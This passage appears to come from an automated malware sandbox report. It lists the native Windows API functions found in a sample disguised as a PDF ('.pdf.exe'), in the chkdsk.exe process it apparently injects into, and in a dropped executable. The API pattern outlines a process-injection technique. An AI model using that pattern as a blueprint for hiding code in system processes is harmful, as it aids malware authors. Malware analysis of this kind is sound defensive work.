          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A370 NtQueryInformationProcess,2_2_00A8A370
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A350 NtQueryValueKey,2_2_00A8A350
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8ACE0 NtCreateMutant,2_2_00A8ACE0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A430 NtQueryVirtualMemory,2_2_00A8A430
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8B410 NtOpenProcessToken,2_2_00A8B410
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A460 NtOpenProcess,2_2_00A8A460
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A470 NtSetInformationFile,2_2_00A8A470
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8B470 NtOpenThread,2_2_00A8B470
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A5A0 NtWriteVirtualMemory,2_2_00A8A5A0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A520 NtEnumerateKey,2_2_00A8A520
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8BD40 NtSuspendThread,2_2_00A8BD40
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A6D0 NtCreateProcessEx,2_2_00A8A6D0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A650 NtQueueApcThread,2_2_00A8A650
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A780 NtOpenDirectoryObject,2_2_00A8A780
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exeCode function: 2_2_00A8A710 NtQuerySection,2_2_00A8A710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_057CA560
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA540 NtDelayExecution,LdrInitializeThunk,4_2_057CA540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA470 NtSetInformationFile,LdrInitializeThunk,4_2_057CA470
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA410 NtQueryInformationToken,LdrInitializeThunk,4_2_057CA410
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CACE0 NtCreateMutant,LdrInitializeThunk,4_2_057CACE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA480 NtMapViewOfSection,LdrInitializeThunk,4_2_057CA480
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA750 NtCreateFile,LdrInitializeThunk,4_2_057CA750
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_057CA610
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA6A0 NtCreateSection,LdrInitializeThunk,4_2_057CA6A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA800 NtSetValueKey,LdrInitializeThunk,4_2_057CA800
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_057CA360
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA350 NtQueryValueKey,LdrInitializeThunk,4_2_057CA350
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_057CA310
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_057CA3E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA3D0 NtCreateKey,LdrInitializeThunk,4_2_057CA3D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA260 NtWriteFile,LdrInitializeThunk,4_2_057CA260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA240 NtReadFile,LdrInitializeThunk,4_2_057CA240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA2D0 NtClose,LdrInitializeThunk,4_2_057CA2D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CBD40 NtSuspendThread,4_2_057CBD40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA520 NtEnumerateKey,4_2_057CA520
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA5F0 NtReadVirtualMemory,4_2_057CA5F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA5A0 NtWriteVirtualMemory,4_2_057CA5A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CB470 NtOpenThread,4_2_057CB470
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA460 NtOpenProcess,4_2_057CA460
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA430 NtQueryVirtualMemory,4_2_057CA430
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CB410 NtOpenProcessToken,4_2_057CB410
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA4A0 NtUnmapViewOfSection,4_2_057CA4A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA720 NtResumeThread,4_2_057CA720
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA710 NtQuerySection,4_2_057CA710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA700 NtProtectVirtualMemory,4_2_057CA700
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA780 NtOpenDirectoryObject,4_2_057CA780
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA650 NtQueueApcThread,4_2_057CA650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA6D0 NtCreateProcessEx,4_2_057CA6D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CB0B0 NtGetContextThread,4_2_057CB0B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA370 NtQueryInformationProcess,4_2_057CA370
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CBA30 NtSetContextThread,4_2_057CBA30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA220 NtWaitForSingleObject,4_2_057CA220
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_057CA2F0 NtQueryInformationFile,4_2_057CA2F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_00DB9850 NtCreateFile,4_2_00DB9850
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_00DB9980 NtClose,4_2_00DB9980
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_00DB9900 NtReadFile,4_2_00DB9900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_00DB9A30 NtAllocateVirtualMemory,4_2_00DB9A30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_00DB98FA NtReadFile,4_2_00DB98FA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4_2_00DB9AAA NtAllocateVirtualMemory,4_2_00DB9AAA
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA2D0 NtClose,LdrInitializeThunk,18_2_00ABA2D0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA240 NtReadFile,LdrInitializeThunk,18_2_00ABA240
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA3E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_00ABA3E0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA360 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_00ABA360
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA4A0 NtUnmapViewOfSection,LdrInitializeThunk,18_2_00ABA4A0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA480 NtMapViewOfSection,LdrInitializeThunk,18_2_00ABA480
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA410 NtQueryInformationToken,LdrInitializeThunk,18_2_00ABA410
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA5F0 NtReadVirtualMemory,LdrInitializeThunk,18_2_00ABA5F0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA560 NtQuerySystemInformation,LdrInitializeThunk,18_2_00ABA560
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA540 NtDelayExecution,LdrInitializeThunk,18_2_00ABA540
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exeCode function: 18_2_00ABA6A0 NtCreateSection,LdrInitializeThunk,18_2_00ABA6A0
          Source: C:\Program Files (x86)\Lp4ml\e<